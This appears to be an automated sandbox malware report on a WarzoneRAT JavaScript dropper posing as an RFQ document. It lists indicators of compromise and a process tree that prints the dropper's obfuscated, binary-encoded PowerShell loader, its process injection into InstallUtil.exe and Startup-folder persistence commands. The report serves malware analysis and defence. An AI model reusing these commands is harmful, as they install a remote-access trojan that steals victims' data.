warzonerat | c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d

Analysis

max time kernel
592s
max time network
601s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
29-11-2022 16:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ scope of requirements.js
Size

2KB
MD5

84ae648af28a2f5acd3c67fabde24615
SHA1

45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b
SHA256

c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d
SHA512

7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Score

10^/10

warzonerat infostealer rat

Malware Config

Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 8 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1256-100-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-101-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-103-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-105-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-106-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-107-0x000000000040B556-mapping.dmp	warzonerat
behavioral1/memory/1256-112-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat
behavioral1/memory/1256-113-0x0000000000400000-0x0000000000568000-memory.dmp	warzonerat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

21 1632 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

1632 powershell.exe
1632 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1632 set thread context of 1256 1632 powershell.exe InstallUtil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
21	1632	powershell.exe

pid	process
1632	powershell.exe
1632	powershell.exe

description	pid	process	target process
PID 1632 set thread context of 1256	1632	powershell.exe	InstallUtil.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376508228"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F49E1F61-700B-11ED-8FA0-42A98B637845} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8a8c2fe870d6949a544f7d34e73af4200000000020000000000106600000001000020000000645289cbb4b5df92b18cbaa6e47da0ca414c22555e153cdd0560fc69c214889e000000000e80000000020000200000009878c6f6fb18df616c2aa2e0a3dbab6382c3baa56a0fecf86f909ac42fd7a8a9200000006c33b6cf060862b6f48375c989bb83451d1c1607a080af32a1d6a226c8dcd49540000000e64eaf237acfba8d83b8351da768a2e5253f5645cc24b3471c6a7bfb871838dd8b7151a0fdd57779888ad9858439908da0dc6066a35b29ec75422401cb090e98	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10d8f4ee1804d901	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8a8c2fe870d6949a544f7d34e73af420000000002000000000010660000000100002000000019451a35660d8c27f79a2e15d3e836d4c64f120d87fe0500056bf89dd92d6862000000000e8000000002000020000000c1204854123b5e1aa9b7608256f0522777cb6d83bd1c8372ae8b4179a50525b090000000fdde01f60feaf665c92a443ffa40867dc9ecd3691eae41da6476b394b0cbce0aa1e16634acb48a2c0fe6668aa2f65d67566156f6211c9d6ba2149828923f2795f21a39cbd73ff6e0c53cb1d52df2353adbfe94a0421a11a884f1a9c416c28e25391a73ea38f5f6a4f14babfecfc6e0c428caffd178b9a8761b1c0e18147d593e415d9d04d35c183c5af1df5d779583bf40000000ee638ba4f4dacd389ce65c5af1a9d0dbea4c0eac3372ce087426d321c7ad58dcdce753622c54c53c552b182af0faeaadd364faa04062c7ccfcb78d5074c59737	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1632 powershell.exe
1596 powershell.exe
268 powershell.exe
1884 powershell.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

powershell.exe

pid process

1884 powershell.exe

pid	process
1632	powershell.exe
1596	powershell.exe
268	powershell.exe
1884	powershell.exe

pid	process
1884	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeIncreaseQuotaPrivilege	1632	powershell.exe
Token: SeSecurityPrivilege	1632	powershell.exe
Token: SeTakeOwnershipPrivilege	1632	powershell.exe
Token: SeLoadDriverPrivilege	1632	powershell.exe
Token: SeSystemProfilePrivilege	1632	powershell.exe
Token: SeSystemtimePrivilege	1632	powershell.exe
Token: SeProfSingleProcessPrivilege	1632	powershell.exe
Token: SeIncBasePriorityPrivilege	1632	powershell.exe
Token: SeCreatePagefilePrivilege	1632	powershell.exe
Token: SeBackupPrivilege	1632	powershell.exe
Token: SeRestorePrivilege	1632	powershell.exe
Token: SeShutdownPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeSystemEnvironmentPrivilege	1632	powershell.exe
Token: SeRemoteShutdownPrivilege	1632	powershell.exe
Token: SeUndockPrivilege	1632	powershell.exe
Token: SeManageVolumePrivilege	1632	powershell.exe
Token: 33	1632	powershell.exe
Token: 34	1632	powershell.exe
Token: 35	1632	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

2012 iexplore.exe
2012 iexplore.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid process

2012 iexplore.exe
2012 iexplore.exe
1440 IEXPLORE.EXE
1440 IEXPLORE.EXE
2012 iexplore.exe
2012 iexplore.exe
1604 IEXPLORE.EXE
1604 IEXPLORE.EXE

pid	process
2012	iexplore.exe
2012	iexplore.exe

pid	process
2012	iexplore.exe
2012	iexplore.exe
1440	IEXPLORE.EXE
1440	IEXPLORE.EXE
2012	iexplore.exe
2012	iexplore.exe
1604	IEXPLORE.EXE
1604	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

iexplore.exewscript.exepowershell.exe

description	pid	process	target process
PID 2012 wrote to memory of 1440	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1440	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1440	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1440	2012	iexplore.exe	IEXPLORE.EXE
PID 1044 wrote to memory of 268	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 268	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 268	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1884	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1884	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1884	1044	wscript.exe	powershell.exe
PID 2012 wrote to memory of 1604	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1604	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1604	2012	iexplore.exe	IEXPLORE.EXE
PID 2012 wrote to memory of 1604	2012	iexplore.exe	IEXPLORE.EXE
PID 1044 wrote to memory of 1632	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1632	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1632	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1596	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1596	1044	wscript.exe	powershell.exe
PID 1044 wrote to memory of 1596	1044	wscript.exe	powershell.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe
PID 1632 wrote to memory of 1256	1632	powershell.exe	InstallUtil.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" This page can’t be displayed This page can’t be displayed Make sure the web address http://104.223.67.151 is correct. Look for the page with your search engine. Refresh the page in a few minutes. Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. Fix connection problems
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  PID:1884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1596

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2012 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1440
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2012 CREDAT:799751 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6QQGL5TH.txt

Filesize
601B

MD5
9d6c44bef0e2cbe7ab9e9ca87b6f78f0

SHA1
ebd0eb16de739bc649fef6d3b8d14c4e219d38cd

SHA256
aa234344e375736faa51464b10d8597a4082251f4241e9581ea6599fdb814ffb

SHA512
5fe74194ed7db2972d43032ae63f8cb0f4e593a6d323e52fbcf3d2a9c9ffd162615e68aa87ececeeea525ffc1df912bcc56d929cb15ae4ab192ee89c3d70868c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7e3aa664c06b872ed20be2554e9b145b

SHA1
50749ab38450ea0f8bc06b0bba4a64046fdde15f

SHA256
c3001030602b0297fa83f535ebf04463ac80085d01d59f5b1fdc8328d8527250

SHA512
af0084a93f7e5e8892959c5341ab65814fd444a393a53f1199b4122e44d17c87e389c4bb291d61889a03cf8cc0049ffacbb2656ac505270e2dfb31d761fffcb7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7e3aa664c06b872ed20be2554e9b145b

SHA1
50749ab38450ea0f8bc06b0bba4a64046fdde15f

SHA256
c3001030602b0297fa83f535ebf04463ac80085d01d59f5b1fdc8328d8527250

SHA512
af0084a93f7e5e8892959c5341ab65814fd444a393a53f1199b4122e44d17c87e389c4bb291d61889a03cf8cc0049ffacbb2656ac505270e2dfb31d761fffcb7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7e3aa664c06b872ed20be2554e9b145b

SHA1
50749ab38450ea0f8bc06b0bba4a64046fdde15f

SHA256
c3001030602b0297fa83f535ebf04463ac80085d01d59f5b1fdc8328d8527250

SHA512
af0084a93f7e5e8892959c5341ab65814fd444a393a53f1199b4122e44d17c87e389c4bb291d61889a03cf8cc0049ffacbb2656ac505270e2dfb31d761fffcb7

Download Submit
\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll

Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
\Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll

Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
memory/268-60-0x000007FEF4410000-0x000007FEF4E33000-memory.dmp

Filesize
10.1MB

Download
memory/268-64-0x000007FEF38B0000-0x000007FEF440D000-memory.dmp

Filesize
11.4MB

Download
memory/268-56-0x0000000000000000-mapping.dmp

Download
memory/268-89-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/268-88-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/268-73-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/268-84-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/1044-54-0x0000000000130000-0x0000000000140000-memory.dmp

Filesize
64KB

Download
memory/1044-55-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

Filesize
8KB

Download
memory/1256-95-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-96-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-113-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-112-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-111-0x00000000756A1000-0x00000000756A3000-memory.dmp

Filesize
8KB

Download
memory/1256-107-0x000000000040B556-mapping.dmp

Download
memory/1256-106-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-105-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-103-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-101-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-100-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1256-98-0x0000000000400000-0x0000000000568000-memory.dmp

Filesize
1.4MB

Download
memory/1596-68-0x0000000000000000-mapping.dmp

Download
memory/1596-85-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/1596-78-0x000007FEF38B0000-0x000007FEF440D000-memory.dmp

Filesize
11.4MB

Download
memory/1596-72-0x000007FEF4410000-0x000007FEF4E33000-memory.dmp

Filesize
10.1MB

Download
memory/1596-79-0x000000001B800000-0x000000001BAFF000-memory.dmp

Filesize
3.0MB

Download
memory/1596-76-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/1596-86-0x0000000002A0B000-0x0000000002A2A000-memory.dmp

Filesize
124KB

Download
memory/1632-91-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/1632-110-0x00000000022CB000-0x00000000022EA000-memory.dmp

Filesize
124KB

Download
memory/1632-63-0x0000000000000000-mapping.dmp

Download
memory/1632-77-0x000007FEF38B0000-0x000007FEF440D000-memory.dmp

Filesize
11.4MB

Download
memory/1632-87-0x00000000022CB000-0x00000000022EA000-memory.dmp

Filesize
124KB

Download
memory/1632-80-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1632-69-0x000007FEF4410000-0x000007FEF4E33000-memory.dmp

Filesize
10.1MB

Download
memory/1632-75-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/1632-93-0x000007FEF6860000-0x000007FEF69E4000-memory.dmp

Filesize
1.5MB

Download
memory/1632-109-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/1884-82-0x0000000001F64000-0x0000000001F67000-memory.dmp

Filesize
12KB

Download
memory/1884-65-0x000007FEF38B0000-0x000007FEF440D000-memory.dmp

Filesize
11.4MB

Download
memory/1884-81-0x0000000001F6B000-0x0000000001F8A000-memory.dmp

Filesize
124KB

Download
memory/1884-83-0x0000000001F6B000-0x0000000001F8A000-memory.dmp

Filesize
124KB

Download
